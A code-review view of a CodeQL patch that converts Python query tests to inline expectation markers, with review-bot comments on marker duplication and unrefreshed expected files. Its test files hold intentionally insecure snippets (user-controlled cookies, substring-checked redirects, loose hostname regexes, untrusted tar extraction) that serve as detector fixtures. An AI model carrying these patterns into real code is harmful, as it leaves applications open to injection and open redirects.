--git a/python/ql/test/query-tests/Lexical/ToDoComment/todo.py b/python/ql/test/query-tests/Lexical/ToDoComment/todo.py index 5e02882924b6..e29370ad3279 100644 --- a/python/ql/test/query-tests/Lexical/ToDoComment/todo.py 
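Review bot: In the last hunk of Imports/unused/imports_test.py, `from pytest_fixtures import not_a_fixture # BAD # $ Alert` now carries two markers for the same fact, and presumably only the `# $ Alert` part is machine-checked once the `postprocess:` line is in the .qlref. The free-text `# BAD` can drift from the enforced expectation without any test noticing, so I would keep a single marker: `from pytest_fixtures import not_a_fixture # $ Alert`. The explanatory `# GOOD (pytest fixtures are used implicitly by pytest)` comments on the following lines can stay, since they say why no alert is expected. The same applies to the `# NOT OK # $ Alert` lines in CWE-020-SuspiciousRegexpRange/test.py.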
+++ b/python/ql/test/query-tests/Lexical/ToDoComment/todo.py @@ -1 +1 @@ -# TO DO -- (Nothing "to do" -- this is a test for TO DO comments) +# TO DO -- (Nothing "to do" -- this is a test for TO DO comments) # $ Alert diff --git a/python/ql/test/query-tests/Lexical/commented_out_code/CommentedOutCode.qlref b/python/ql/test/query-tests/Lexical/commented_out_code/CommentedOutCode.qlref index 6fe55e0fa940..39456a2013e7 100644 --- a/python/ql/test/query-tests/Lexical/commented_out_code/CommentedOutCode.qlref +++ b/python/ql/test/query-tests/Lexical/commented_out_code/CommentedOutCode.qlref @@ -1 +1,2 @@ -Lexical/CommentedOutCode.ql +query: Lexical/CommentedOutCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Lexical/commented_out_code/FCommentedOutCode.qlref b/python/ql/test/query-tests/Lexical/commented_out_code/FCommentedOutCode.qlref index 2776efbcfd3e..cb0c813f0095 100644 --- a/python/ql/test/query-tests/Lexical/commented_out_code/FCommentedOutCode.qlref +++ b/python/ql/test/query-tests/Lexical/commented_out_code/FCommentedOutCode.qlref @@ -1 +1 @@ -Lexical/FCommentedOutCode.ql +query: Lexical/FCommentedOutCode.ql diff --git a/python/ql/test/query-tests/Lexical/commented_out_code/test.py b/python/ql/test/query-tests/Lexical/commented_out_code/test.py index 067855b67447..685a2080f6c2 100644 --- a/python/ql/test/query-tests/Lexical/commented_out_code/test.py +++ b/python/ql/test/query-tests/Lexical/commented_out_code/test.py @@ -13,7 +13,7 @@ def f(x): if x: do_something() #else: - # do_something_else() + # do_something_else() # $ Alert # Some non-code comments. # Space immediately after scope start and between functions. @@ -69,7 +69,7 @@ def f(x): # # #def m(): -# pass +# pass # $ Alert # # # @@ -82,7 +82,7 @@ def f(x): #except Exception: # pass #except: -# pass +# pass # $ Alert def a_function_to_break_up_comments(): pass 
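Review bot: The marker added in ToDoComment/todo.py is appended to the very comment the query reports, so that comment's text and end column change, yet no ToDoComment.expected update appears next to the .qlref change in this patch. Unless the expected file is regenerated elsewhere in the series, it should be refreshed and checked for a `testFailures` section before merging. The same applies to commented_out_code/test.py, where `# $ Alert` is appended to the last line of each commented-out block (`# do_something_else() # $ Alert`, `# pass # $ Alert`) and no CommentedOutCode.expected change is visible. There the marker also becomes part of the text the commented-out-code heuristic classifies, so it is worth confirming that the three blocks are still reported with the intended extent.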
diff --git a/python/ql/test/query-tests/Metrics/cyclo/CyclomaticComplexity.qlref b/python/ql/test/query-tests/Metrics/cyclo/CyclomaticComplexity.qlref
index c74ae215bb40..8e150c5a5c8a 100644
--- a/python/ql/test/query-tests/Metrics/cyclo/CyclomaticComplexity.qlref
+++ b/python/ql/test/query-tests/Metrics/cyclo/CyclomaticComplexity.qlref
@@ -1 +1 @@
-Metrics/CyclomaticComplexity.ql
+query: Metrics/CyclomaticComplexity.ql
diff --git a/python/ql/test/query-tests/Metrics/functions/FunctionStatementNestingDepth.qlref b/python/ql/test/query-tests/Metrics/functions/FunctionStatementNestingDepth.qlref
index 797f223792f2..5be0496cf087 100644
--- a/python/ql/test/query-tests/Metrics/functions/FunctionStatementNestingDepth.qlref
+++ b/python/ql/test/query-tests/Metrics/functions/FunctionStatementNestingDepth.qlref
@@ -1 +1 @@
-Metrics/FunctionStatementNestingDepth.ql
\ No newline at end of file
+query: Metrics/FunctionStatementNestingDepth.ql
diff --git a/python/ql/test/query-tests/Metrics/imports/DirectImports.qlref b/python/ql/test/query-tests/Metrics/imports/DirectImports.qlref
index 84fe2dc5805b..0878b8892634 100644
--- a/python/ql/test/query-tests/Metrics/imports/DirectImports.qlref
+++ b/python/ql/test/query-tests/Metrics/imports/DirectImports.qlref
@@ -1 +1 @@
-Metrics/DirectImports.ql
+query: Metrics/DirectImports.ql
diff --git a/python/ql/test/query-tests/Metrics/imports/TransitiveImports.qlref b/python/ql/test/query-tests/Metrics/imports/TransitiveImports.qlref
index 1bacdce45c28..35e369b89b41 100644
--- a/python/ql/test/query-tests/Metrics/imports/TransitiveImports.qlref
+++ b/python/ql/test/query-tests/Metrics/imports/TransitiveImports.qlref
@@ -1 +1 @@
-Metrics/TransitiveImports.ql
\ No newline at end of file
+query: Metrics/TransitiveImports.ql
diff --git a/python/ql/test/query-tests/Metrics/lines/CommentRatio.qlref b/python/ql/test/query-tests/Metrics/lines/CommentRatio.qlref
index 9c3179ac5033..a8be2d84cc5d 100644
--- a/python/ql/test/query-tests/Metrics/lines/CommentRatio.qlref
+++ b/python/ql/test/query-tests/Metrics/lines/CommentRatio.qlref
@@ -1 +1 @@
-Metrics/CommentRatio.ql
+query: Metrics/CommentRatio.ql
diff --git a/python/ql/test/query-tests/Metrics/lines/FLinesOfCode.qlref b/python/ql/test/query-tests/Metrics/lines/FLinesOfCode.qlref
index 2ac69b8f67a8..6a2c24b94b1d 100644
--- a/python/ql/test/query-tests/Metrics/lines/FLinesOfCode.qlref
+++ b/python/ql/test/query-tests/Metrics/lines/FLinesOfCode.qlref
@@ -1 +1 @@
-Metrics/FLinesOfCode.ql
+query: Metrics/FLinesOfCode.ql
diff --git a/python/ql/test/query-tests/Metrics/ratios/CommentRatio.qlref b/python/ql/test/query-tests/Metrics/ratios/CommentRatio.qlref
index dc273e169828..a8be2d84cc5d 100644
--- a/python/ql/test/query-tests/Metrics/ratios/CommentRatio.qlref
+++ b/python/ql/test/query-tests/Metrics/ratios/CommentRatio.qlref
@@ -1 +1 @@
-Metrics/CommentRatio.ql
\ No newline at end of file
+query: Metrics/CommentRatio.ql
diff --git a/python/ql/test/query-tests/Metrics/ratios/DocStringRatio.qlref b/python/ql/test/query-tests/Metrics/ratios/DocStringRatio.qlref
index ec66c5cdc834..c8c5812818f6 100644
--- a/python/ql/test/query-tests/Metrics/ratios/DocStringRatio.qlref
+++ b/python/ql/test/query-tests/Metrics/ratios/DocStringRatio.qlref
@@ -1 +1 @@
-Metrics/DocStringRatio.ql
\ No newline at end of file
+query: Metrics/DocStringRatio.ql
diff --git a/python/ql/test/query-tests/Metrics/tests/FNumberOfTests.qlref b/python/ql/test/query-tests/Metrics/tests/FNumberOfTests.qlref
index e7301c3b2302..46d66e549876 100644
--- a/python/ql/test/query-tests/Metrics/tests/FNumberOfTests.qlref
+++ b/python/ql/test/query-tests/Metrics/tests/FNumberOfTests.qlref
@@ -1 +1 @@
-Metrics/FNumberOfTests.ql
\ No newline at end of file
+query: Metrics/FNumberOfTests.ql
diff --git a/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.expected b/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.expected index cf3a06ac7c8f..6e9c8ff47dc8 100644 --- a/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.expected @@ -1,3 +1,7 @@ +#select +| django_tests.py:6:21:6:43 | ControlFlowNode for Attribute() | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:6:21:6:43 | ControlFlowNode for Attribute() | Cookie is constructed from a $@. | django_tests.py:4:25:4:31 | ControlFlowNode for request | user-supplied input | +| django_tests.py:7:21:7:44 | ControlFlowNode for Attribute() | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:7:21:7:44 | ControlFlowNode for Attribute() | Cookie is constructed from a $@. | django_tests.py:4:25:4:31 | ControlFlowNode for request | user-supplied input | +| django_tests.py:13:30:13:100 | ControlFlowNode for Fstring | django_tests.py:11:26:11:32 | ControlFlowNode for request | django_tests.py:13:30:13:100 | ControlFlowNode for Fstring | Cookie is constructed from a $@. | django_tests.py:11:26:11:32 | ControlFlowNode for request | user-supplied input | edges | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:6:21:6:31 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:7:21:7:31 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | 
@@ -22,7 +26,3 @@ nodes | django_tests.py:13:59:13:69 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute | | django_tests.py:13:59:13:82 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | subpaths -#select -| django_tests.py:6:21:6:43 | ControlFlowNode for Attribute() | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:6:21:6:43 | ControlFlowNode for Attribute() | Cookie is constructed from a $@. | django_tests.py:4:25:4:31 | ControlFlowNode for request | user-supplied input | -| django_tests.py:7:21:7:44 | ControlFlowNode for Attribute() | django_tests.py:4:25:4:31 | ControlFlowNode for request | django_tests.py:7:21:7:44 | ControlFlowNode for Attribute() | Cookie is constructed from a $@. | django_tests.py:4:25:4:31 | ControlFlowNode for request | user-supplied input | -| django_tests.py:13:30:13:100 | ControlFlowNode for Fstring | django_tests.py:11:26:11:32 | ControlFlowNode for request | django_tests.py:13:30:13:100 | ControlFlowNode for Fstring | Cookie is constructed from a $@. | django_tests.py:11:26:11:32 | ControlFlowNode for request | user-supplied input | diff --git a/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.qlref b/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.qlref index a405c564b1bf..788c1b424ff5 100644 --- a/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-020-CookieInjection/CookieInjection.qlref @@ -1 +1,2 @@ -Security/CWE-020/CookieInjection.ql \ No newline at end of file +query: Security/CWE-020/CookieInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-020-CookieInjection/django_tests.py b/python/ql/test/query-tests/Security/CWE-020-CookieInjection/django_tests.py index e070f5cab82b..b016f98dc831 100644 
--- a/python/ql/test/query-tests/Security/CWE-020-CookieInjection/django_tests.py +++ b/python/ql/test/query-tests/Security/CWE-020-CookieInjection/django_tests.py @@ -1,16 +1,16 @@ import django.http from django.urls import path -def django_response_bad(request): +def django_response_bad(request): # $ Source resp = django.http.HttpResponse() - resp.set_cookie(request.GET.get("name"), # BAD: Cookie is constructed from user input - request.GET.get("value")) + resp.set_cookie(request.GET.get("name"), # BAD: Cookie is constructed from user input # $ Alert + request.GET.get("value")) # $ Alert return resp -def django_response_bad2(request): +def django_response_bad2(request): # $ Source response = django.http.HttpResponse() - response['Set-Cookie'] = f"{request.GET.get('name')}={request.GET.get('value')}; SameSite=None;" # BAD: Cookie header is constructed from user input. + response['Set-Cookie'] = f"{request.GET.get('name')}={request.GET.get('value')}; SameSite=None;" # BAD: Cookie header is constructed from user input. # $ Alert return response # fake setup, you can't actually run this diff --git a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/ExternalAPIsUsedWithUntrustedData.qlref b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/ExternalAPIsUsedWithUntrustedData.qlref index c91bf44f815c..34ac0b640147 100644 --- a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/ExternalAPIsUsedWithUntrustedData.qlref +++ b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/ExternalAPIsUsedWithUntrustedData.qlref @@ -1 +1 @@ -Security/CWE-020-ExternalAPIs/ExternalAPIsUsedWithUntrustedData.ql +query: Security/CWE-020-ExternalAPIs/ExternalAPIsUsedWithUntrustedData.ql diff --git a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.expected b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.expected index 7f83ceae8fe0..69039d12c4d1 100644 
--- a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.expected +++ b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.expected 
@@ -1,3 +1,10 @@ +#select +| test.py:15:36:15:39 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:15:36:15:39 | ControlFlowNode for data | Call to hmac.new [position 1] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:25:44:25:47 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:25:44:25:47 | ControlFlowNode for data | Call to hmac.new [keyword msg] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:35:10:35:13 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:35:10:35:13 | ControlFlowNode for data | Call to unknown.lib.func [position 0] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:36:13:36:16 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:36:13:36:16 | ControlFlowNode for data | Call to unknown.lib.func [keyword kw] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:43:22:43:25 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:43:22:43:25 | ControlFlowNode for data | Call to unknown.lib.func [position 0] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | +| test.py:44:25:44:28 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:44:25:44:28 | ControlFlowNode for data | Call to unknown.lib.func [keyword kw] with untrusted data from $@. 
| test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | edges | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:5:26:5:32 | ControlFlowNode for request | provenance | | | test.py:5:26:5:32 | ControlFlowNode for request | test.py:13:16:13:22 | ControlFlowNode for request | provenance | | 
@@ -68,10 +75,3 @@ nodes | test.py:54:12:54:35 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | test.py:55:17:55:20 | ControlFlowNode for data | semmle.label | ControlFlowNode for data | subpaths -#select -| test.py:15:36:15:39 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:15:36:15:39 | ControlFlowNode for data | Call to hmac.new [position 1] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:25:44:25:47 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:25:44:25:47 | ControlFlowNode for data | Call to hmac.new [keyword msg] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:35:10:35:13 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:35:10:35:13 | ControlFlowNode for data | Call to unknown.lib.func [position 0] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:36:13:36:16 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:36:13:36:16 | ControlFlowNode for data | Call to unknown.lib.func [keyword kw] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:43:22:43:25 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:43:22:43:25 | ControlFlowNode for data | Call to unknown.lib.func [position 0] with untrusted data from $@. 
| test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | -| test.py:44:25:44:28 | ControlFlowNode for data | test.py:5:26:5:32 | ControlFlowNode for ImportMember | test.py:44:25:44:28 | ControlFlowNode for data | Call to unknown.lib.func [keyword kw] with untrusted data from $@. | test.py:5:26:5:32 | ControlFlowNode for ImportMember | ControlFlowNode for ImportMember | diff --git a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.qlref b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.qlref index 03c06feeec88..fbacbf2a07a0 100644 --- a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.qlref +++ b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.qlref @@ -1 +1,2 @@ -Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.ql +query: Security/CWE-020-ExternalAPIs/UntrustedDataToExternalAPI.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/test.py b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/test.py index 18b46298d8af..f2857914c03b 100644 --- a/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/test.py +++ b/python/ql/test/query-tests/Security/CWE-020-ExternalAPIs/test.py @@ -2,7 +2,7 @@ import hmac import base64 -from flask import Flask, request, make_response +from flask import Flask, request, make_response # $ Source app = Flask(__name__) SECRET_KEY = b"SECRET_KEY" @@ -12,7 +12,7 @@ def hmac_example(): data_raw = request.args.get("data").encode('utf-8') data = base64.decodebytes(data_raw) - my_hmac = hmac.new(SECRET_KEY, data, hashlib.sha256) + my_hmac = hmac.new(SECRET_KEY, data, hashlib.sha256) # $ Alert digest = my_hmac.digest() print(digest) return "ok" 
@@ -22,7 +22,7 @@ def hmac_example(): def hmac_example2(): data_raw = request.args.get("data").encode('utf-8') data = base64.decodebytes(data_raw) - my_hmac = hmac.new(key=SECRET_KEY, msg=data, digestmod=hashlib.sha256) + my_hmac = hmac.new(key=SECRET_KEY, msg=data, digestmod=hashlib.sha256) # $ Alert digest = my_hmac.digest() print(digest) return "ok" @@ -32,16 +32,16 @@ def hmac_example2(): def unknown_lib_1(): from unknown.lib import func data = request.args.get("data") - func(data) - func(kw=data) + func(data) # $ Alert + func(kw=data) # $ Alert @app.route("/unknown-lib-2") def unknown_lib_2(): import unknown.lib data = request.args.get("data") - unknown.lib.func(data) - unknown.lib.func(kw=data) + unknown.lib.func(data) # $ Alert + unknown.lib.func(kw=data) # $ Alert def handle_this(arg, application = None): diff --git a/python/ql/test/query-tests/Security/CWE-020-IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref b/python/ql/test/query-tests/Security/CWE-020-IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref index e818d9472521..d1afa3858252 100644 --- a/python/ql/test/query-tests/Security/CWE-020-IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref +++ b/python/ql/test/query-tests/Security/CWE-020-IncompleteHostnameRegExp/IncompleteHostnameRegExp.qlref @@ -1 +1,2 @@ -Security/CWE-020/IncompleteHostnameRegExp.ql \ No newline at end of file +query: Security/CWE-020/IncompleteHostnameRegExp.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-020-IncompleteHostnameRegExp/hosttest.py b/python/ql/test/query-tests/Security/CWE-020-IncompleteHostnameRegExp/hosttest.py index ca7f7094a8c9..e2e90e651424 100644 --- a/python/ql/test/query-tests/Security/CWE-020-IncompleteHostnameRegExp/hosttest.py +++ b/python/ql/test/query-tests/Security/CWE-020-IncompleteHostnameRegExp/hosttest.py 
@@ -3,7 +3,7 @@ app = Flask(__name__) -UNSAFE_REGEX = re.compile("(www|beta).example.com/") +UNSAFE_REGEX = re.compile("(www|beta).example.com/") # $ Alert SAFE_REGEX = re.compile(r"(www|beta)\.example\.com/") @app.route('/some/path/bad') diff --git a/python/ql/test/query-tests/Security/CWE-020-IncompleteUrlSubstringSanitization/IncompleteUrlSubstringSanitization.qlref b/python/ql/test/query-tests/Security/CWE-020-IncompleteUrlSubstringSanitization/IncompleteUrlSubstringSanitization.qlref index 3fa6794419d7..1c4c23821534 100644 --- a/python/ql/test/query-tests/Security/CWE-020-IncompleteUrlSubstringSanitization/IncompleteUrlSubstringSanitization.qlref +++ b/python/ql/test/query-tests/Security/CWE-020-IncompleteUrlSubstringSanitization/IncompleteUrlSubstringSanitization.qlref @@ -1 +1,2 @@ -Security/CWE-020/IncompleteUrlSubstringSanitization.ql \ No newline at end of file +query: Security/CWE-020/IncompleteUrlSubstringSanitization.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-020-IncompleteUrlSubstringSanitization/urltest.py b/python/ql/test/query-tests/Security/CWE-020-IncompleteUrlSubstringSanitization/urltest.py index 308b946603b8..bc59d83819ac 100644 --- a/python/ql/test/query-tests/Security/CWE-020-IncompleteUrlSubstringSanitization/urltest.py +++ b/python/ql/test/query-tests/Security/CWE-020-IncompleteUrlSubstringSanitization/urltest.py @@ -6,13 +6,13 @@ @app.route('/some/path/bad1') def unsafe1(request): target = request.args.get('target', '') - if "example.com" in target: + if "example.com" in target: # $ Alert return redirect(target) @app.route('/some/path/bad2') def unsafe2(request): target = request.args.get('target', '') - if target.endswith("example.com"): + if target.endswith("example.com"): # $ Alert return redirect(target) 
diff --git a/python/ql/test/query-tests/Security/CWE-020-SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref b/python/ql/test/query-tests/Security/CWE-020-SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref index 77b5c92707f9..c42315c4550e 100644 --- a/python/ql/test/query-tests/Security/CWE-020-SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref +++ b/python/ql/test/query-tests/Security/CWE-020-SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref @@ -1 +1,2 @@ -Security/CWE-020/OverlyLargeRange.ql +query: Security/CWE-020/OverlyLargeRange.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-020-SuspiciousRegexpRange/test.py b/python/ql/test/query-tests/Security/CWE-020-SuspiciousRegexpRange/test.py index 43380ccef0db..d24dcef864d0 100644 --- a/python/ql/test/query-tests/Security/CWE-020-SuspiciousRegexpRange/test.py +++ b/python/ql/test/query-tests/Security/CWE-020-SuspiciousRegexpRange/test.py @@ -1,10 +1,10 @@ import re -overlap1 = re.compile(r'^[0-93-5]$') # NOT OK +overlap1 = re.compile(r'^[0-93-5]$') # NOT OK # $ Alert -overlap2 = re.compile(r'[A-ZA-z]') # NOT OK +overlap2 = re.compile(r'[A-ZA-z]') # NOT OK # $ Alert -isEmpty = re.compile(r'^[z-a]$') # NOT OK +isEmpty = re.compile(r'^[z-a]$') # NOT OK # $ Alert isAscii = re.compile(r'^[\x00-\x7F]*$') # OK 
@@ -14,18 +14,18 @@ NON_ALPHANUMERIC_REGEXP = re.compile(r'([^\#-~| |!])') # OK -smallOverlap = re.compile(r'[0-9a-fA-f]') # NOT OK +smallOverlap = re.compile(r'[0-9a-fA-f]') # NOT OK # $ Alert -weirdRange = re.compile(r'[$-`]') # NOT OK +weirdRange = re.compile(r'[$-`]') # NOT OK # $ Alert -keywordOperator = re.compile(r'[!\~\*\/%+-<>\^|=&]') # NOT OK +keywordOperator = re.compile(r'[!\~\*\/%+-<>\^|=&]') # NOT OK # $ Alert -notYoutube = re.compile(r'youtu\.be\/[a-z1-9.-_]+') # NOT OK +notYoutube = re.compile(r'youtu\.be\/[a-z1-9.-_]+') # NOT OK # $ Alert -numberToLetter = re.compile(r'[7-F]') # NOT OK +numberToLetter = re.compile(r'[7-F]') # NOT OK # $ Alert -overlapsWithClass1 = re.compile(r'[0-9\d]') # NOT OK +overlapsWithClass1 = re.compile(r'[0-9\d]') # NOT OK # $ Alert -overlapsWithClass2 = re.compile(r'[\w,.-?:*+]') # NOT OK +overlapsWithClass2 = re.compile(r'[\w,.-?:*+]') # NOT OK # $ Alert -unicodeStuff = re.compile('[\U0001D173-\U0001D17A\U000E0020-\U000E007F\U000e0001]') # NOT OK \ No newline at end of file +unicodeStuff = re.compile('[\U0001D173-\U0001D17A\U000E0020-\U000E007F\U000e0001]') # NOT OK # $ Alert \ No newline at end of file diff --git a/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.expected b/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.expected index 6f98ea1aae2b..abdccddd631b 100644 --- a/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.expected +++ b/python/ql/test/query-tests/Security/CWE-022-TarSlip/TarSlip.expected 
@@ -1,3 +1,13 @@ +#select +| tarslip.py:15:1:15:3 | ControlFlowNode for tar | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | tarslip.py:15:1:15:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:20:17:20:21 | ControlFlowNode for entry | tarslip.py:18:7:18:39 | ControlFlowNode for Attribute() | tarslip.py:20:17:20:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:18:7:18:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:39:17:39:21 | ControlFlowNode for entry | tarslip.py:35:7:35:39 | ControlFlowNode for Attribute() | tarslip.py:39:17:39:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:35:7:35:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:43:24:43:26 | ControlFlowNode for tar | tarslip.py:42:7:42:39 | ControlFlowNode for Attribute() | tarslip.py:43:24:43:26 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:42:7:42:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:61:21:61:25 | ControlFlowNode for entry | tarslip.py:58:7:58:39 | ControlFlowNode for Attribute() | tarslip.py:61:21:61:25 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:58:7:58:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:91:1:91:3 | ControlFlowNode for tar | tarslip.py:90:7:90:39 | ControlFlowNode for Attribute() | tarslip.py:91:1:91:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:90:7:90:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:96:17:96:21 | ControlFlowNode for entry | tarslip.py:94:7:94:39 | ControlFlowNode for Attribute() | tarslip.py:96:17:96:21 | ControlFlowNode for entry | This file extraction depends on a $@. 
| tarslip.py:94:7:94:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:110:1:110:3 | ControlFlowNode for tar | tarslip.py:109:7:109:39 | ControlFlowNode for Attribute() | tarslip.py:110:1:110:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:109:7:109:39 | ControlFlowNode for Attribute() | potentially untrusted source | +| tarslip.py:113:24:113:26 | ControlFlowNode for tar | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | tarslip.py:113:24:113:26 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | potentially untrusted source | edges | tarslip.py:14:1:14:3 | ControlFlowNode for tar | tarslip.py:15:1:15:3 | ControlFlowNode for tar | provenance | | | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | tarslip.py:14:1:14:3 | ControlFlowNode for tar | provenance | | 
@@ -54,13 +64,3 @@ nodes | tarslip.py:112:7:112:39 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | tarslip.py:113:24:113:26 | ControlFlowNode for tar | semmle.label | ControlFlowNode for tar | subpaths -#select -| tarslip.py:15:1:15:3 | ControlFlowNode for tar | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | tarslip.py:15:1:15:3 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:14:7:14:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:20:17:20:21 | ControlFlowNode for entry | tarslip.py:18:7:18:39 | ControlFlowNode for Attribute() | tarslip.py:20:17:20:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:18:7:18:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:39:17:39:21 | ControlFlowNode for entry | tarslip.py:35:7:35:39 | ControlFlowNode for Attribute() | tarslip.py:39:17:39:21 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:35:7:35:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:43:24:43:26 | ControlFlowNode for tar | tarslip.py:42:7:42:39 | ControlFlowNode for Attribute() | tarslip.py:43:24:43:26 | ControlFlowNode for tar | This file extraction depends on a $@. | tarslip.py:42:7:42:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:61:21:61:25 | ControlFlowNode for entry | tarslip.py:58:7:58:39 | ControlFlowNode for Attribute() | tarslip.py:61:21:61:25 | ControlFlowNode for entry | This file extraction depends on a $@. | tarslip.py:58:7:58:39 | ControlFlowNode for Attribute() | potentially untrusted source | -| tarslip.py:91:1:91:3 | ControlFlowNode for tar | tarslip.py:90:7:90:39 | ControlFlowNode for Attribute() | tarslip.py:91:1:91:3 | ControlFlowNode for tar | This file 